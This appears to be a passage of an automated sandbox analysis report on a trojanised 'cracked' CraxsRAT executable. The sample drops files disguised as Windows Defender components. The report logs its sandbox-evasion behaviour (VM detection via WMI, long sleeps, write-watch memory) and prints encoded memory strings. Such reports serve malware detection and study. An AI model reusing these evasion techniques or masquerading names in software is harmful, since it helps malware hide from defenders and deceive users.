Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Memory allocated: 6500000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Memory allocated: 82E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Memory allocated: A2E0000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Memory allocated: AF70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Memory allocated: BF70000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Memory allocated: C0A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Memory allocated: D8A0000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Memory allocated: DAF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Memory allocated: AF70000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Memory allocated: 10AF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Memory allocated: 16AF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Memory allocated: B400000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Memory allocated: BD10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Memory allocated: CD10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Memory allocated: E510000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Memory allocated: 222F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Memory allocated: 11510000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Memory allocated: 282F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Memory allocated: AF70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Memory allocated: EF70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Memory allocated: 2FE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Memory allocated: 2FE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Memory allocated: 4FE0000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CraxsRat.exe	Memory allocated: 20F1FDE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CraxsRat.exe	Memory allocated: 20F39A10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Memory allocated: 1690000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Memory allocated: 32F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Memory allocated: 52F0000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Memory allocated: 1360000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Memory allocated: 32C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Memory allocated: 1660000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Memory allocated: 950000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Memory allocated: 1A680000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Memory allocated: 1200000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Memory allocated: 30F0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Memory allocated: 1350000 memory commit \| memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe	Memory allocated: 1710000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe	Memory allocated: 1B290000 memory reserve \| memory write watch

Contains long sleeps (>= 3 min)

Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe	Thread delayed: delay time: 922337203685477

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Window / User API: threadDelayed 2873	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Window / User API: threadDelayed 4252	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Window / User API: threadDelayed 1249	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Window / User API: foregroundWindowGot 1720	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Window / User API: threadDelayed 4814	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Window / User API: threadDelayed 5015	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7692
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1876
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6439
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1243
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6790
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 933
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4646
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1592

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe TID: 1480	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe TID: 2360	Thread sleep time: -4252000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe TID: 2360	Thread sleep time: -1249000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe TID: 3116	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6380	Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3180	Thread sleep count: 6439 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3640	Thread sleep count: 1243 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5892	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1632	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3748	Thread sleep count: 6790 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4712	Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4480	Thread sleep count: 933 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4952	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5780	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4332	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe TID: 6168	Thread sleep time: -922337203685477s >= -30000s

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior

Source: CraxsRAT v7.6 Cracked.exe, 00000000.00000002.2508664015.000000000B971000.00000004.00000800.00020000.00000000.sdmp, CraxsRat.exe, 00000004.00000000.2193397562.0000020F1C612000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: gBe3XYsV4oDQui+aRx3UrFHgfs1fic0Kn52gAbE1U8oRoxkPEGS449lSwjy9oOG6mpCuDTVk4kVL
Source: CraxsRat.exe, 00000004.00000000.2193397562.0000020F1D012000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: KVMciNxbei79M7jaHiq0apTnxb14L4BwWcXmsJT3ShdGlGxLjI14udCHHq6xiiTbNTy2v3DTh/mB
Source: CraxsRAT v7.6 Cracked.exe, 00000000.00000002.2508664015.000000000B971000.00000004.00000800.00020000.00000000.sdmp, CraxsRat.exe, 00000004.00000000.2193397562.0000020F1C612000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: wELPqEMugsOI9fRYfEvl9uhyQvTwr5nU68yLFBOZZCvz8CueGeOhB1OuN+zSZdTR7qQ0iQQnhJBj
Source: CraxsRat.exe, 00000004.00000000.2193397562.0000020F1D012000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: FUC6ZMk3mh/cFeBcYt1kX0Yg9Ykx3WMHAv/mT1HudwzSgpvmciRytdEIRvXhRzJ5qXaWkSAfLvcf
Source: CraxsRAT v7.6 Cracked.exe, 00000000.00000002.2508664015.000000000C371000.00000004.00000800.00020000.00000000.sdmp, CraxsRat.exe, 00000004.00000000.2193397562.0000020F1D012000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: 4jt7p+OSU8ch0NXYaFBkBAYMGlHgFS0RAgBtyXiFy9loda1WPycGJnijKluLqJi4SF79OE0h2Hn7
Source: CraxsRat.exe, 00000004.00000000.2193397562.0000020F1C612000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: 4u9rlxLsHJnnp2wiQP6k0DgvVmciaqplDTFcCcE0dGfmHrr5Pd0XBkVa5pQHO7KShtZvabXEyd7l
Source: CraxsRat.exe, 00000004.00000000.2193397562.0000020F1D012000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: fOXE8j+7bgE0ekcHQ5cZADYm2MD9RlUHXrGi6x7jDbF6OLBSOkMGN9vQfQBF9XlvmcIbE3AUPzOx
Source: CraxsRAT v7.6 Cracked.exe, 00000000.00000002.2508664015.000000000C371000.00000004.00000800.00020000.00000000.sdmp, CraxsRat.exe, 00000004.00000000.2193397562.0000020F1D012000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: x+BJTVORr1fKhgfs9Al7TKsy4+THJ1XN8HM9fqTBSeqDyjr7L0PMUMW/FlLnf6n9FUlWegMlykqR
Source: Windows Defender Real Time Protection.exe, 00000002.00000002.4613166474.00000000010BE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Windows Defender Real Time Protection.exe, 00000002.00000002.4613166474.00000000010BE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllX/
Source: CraxsRAT v7.6 Cracked.exe, 00000000.00000002.2508664015.000000000C371000.00000004.00000800.00020000.00000000.sdmp, CraxsRat.exe, 00000004.00000000.2193397562.0000020F1D012000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: LRI6nD99xi+Wu0fMarE2q8+wl4AL7aRccWYuvId5p7Sv1TMEkVthgFS1kkr65UGcvJTCg7EXm5W+
Source: CraxsRat.exe, 00000004.00000000.2193397562.0000020F1D012000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: bOGPUz2Z1G/QfdjFJo7QzHMMz4cfOwasT2P97ByonBdID73LKbCfus4zvmcIDN5wrTGbxLbgK5aU
Source: CraxsRat.exe, 00000004.00000000.2193397562.0000020F1C612000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: Xd7tzkf+YnhJ41oCfrvmCIddPnBdH2cln/54W/tFdOkVD53hJX6r/Ax9UM5zBiCcu924bPnuarlS
